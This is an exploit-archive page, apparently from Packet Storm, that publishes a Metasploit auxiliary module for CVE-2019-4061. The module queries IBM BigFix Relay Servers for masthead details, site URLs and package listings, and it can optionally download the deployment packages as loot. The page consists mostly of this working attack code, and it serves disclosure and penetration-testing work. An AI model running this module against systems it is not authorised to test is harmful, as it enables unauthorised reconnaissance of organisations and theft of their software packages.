exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IBM BigFix Relay Server Sites and Package Enum

IBM BigFix Relay Server Sites and Package Enum
Posted Aug 31, 2024
Authored by H D Moore, Jacob Robles, Ryan Hanson, Chris Bellows | Site metasploit.com

This Metasploit module retrieves masthead, site, and available package information from IBM BigFix Relay Servers.

tags | exploit
advisories | CVE-2019-4061
SHA-256 | 0b7bd2a7349296cdb8ba1a119f5620f2d6426c6e3d15107e524b74a942e1630b

IBM BigFix Relay Server Sites and Package Enum

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'IBM BigFix Relay Server Sites and Package Enum',
'Description' => %q{
This module retrieves masthead, site, and available package information
from IBM BigFix Relay Servers.
},
'Author' =>
[
'HD Moore', # Vulnerability Discovery
'Chris Bellows', # Vulnerability Discovery
'Ryan Hanson', # Vulnerability Discovery
'Jacob Robles' # Metasploit module
],
'References' =>
[
['CVE','2019-4061'],
['URL','https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers']
],
'DefaultOptions' =>
{
'RPORT' => 52311,
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2019-03-18' # Blog post date
))

register_options [
OptString.new('TARGETURI', [true, 'Path to the BigFix server', '/']),
OptBool.new('SHOW_MASTHEAD', [true, 'Retrieve information from masthead file', true]),
OptBool.new('SHOW_SITES', [true, 'Retrieve site listing', true]),
OptBool.new('SHOW_PACKAGES', [true, 'Retrieve packages list', true]),
OptBool.new('DOWNLOAD', [true, 'Attempt to download packages', false])
]

register_advanced_options [
OptBool.new('ShowURL', [true, 'Show URL instead of filename', false])
]
end

def send_req(uri)
send_request_cgi({
'uri' => normalize_uri(target_uri, uri)
})
end

def masthead
res = send_req('masthead/masthead.axfm')
return unless res && res.code == 200

if res.body =~ /Organization: (.*)./
print_good($1)
end

res.body.scan(/URL: (.*)./).each do |http|
print_good(http[0])
end
end

def sites
res = send_req('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands')
return unless res && res.code == 200

print_status('Sites')
res.body.scan(/: ([^ ]+)/).each do |url|
print_good(url[0])
end
end

def packages
res = send_req('cgi-bin/bfenterprise/BESMirrorRequest.exe')
return unless res && res.code == 200

print_status('Packages')
last_action = nil
@files = {}

myhtml = res.get_html_document
myhtml.css('.indented p').each do |element|
element.children.each do |text|
if text.class == Nokogiri::XML::Text
next if text.text.start_with?('Error')

text.text =~ /^([^ ]+)/
case $1
when 'Action:'
# Save Action to associate URLs
text.text =~ /Action: ([0-9]+)/
last_action = $1
@files[last_action] = []
print_status("Action: #{last_action}")
when 'url'
text.text =~ /^[^:]+: (.*)/
uri = URI.parse($1)
file = File.basename(uri.path)
@files[last_action].append(file)
datastore['ShowURL'] ? print_good("URL: #{$1}") : print_good("File: #{file}")
end
end
end
end
end

def download
print_status('Downloading packages')
@files.each do |action, val|
next if val.empty?
res = send_req("bfmirror/downloads/#{action}/0")
next unless res && res.code == 200

print_status("Downloading file #{val.first}")
res = send_req("bfmirror/downloads/#{action}/1")
unless res && res.code == 200
print_error("Failed to download #{val.first}")
next
end

myloot = store_loot('ibm.bigfix.package', File.extname(val.first), datastore['RHOST'], res.body, val.first)
print_good("Saved #{val.first} to #{myloot.to_s}")
end
end

def run
masthead if datastore['SHOW_MASTHEAD']
sites if datastore['SHOW_SITES']
packages if datastore['SHOW_PACKAGES'] || datastore['DOWNLOAD']
download if datastore['DOWNLOAD'] && @files != {}
end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close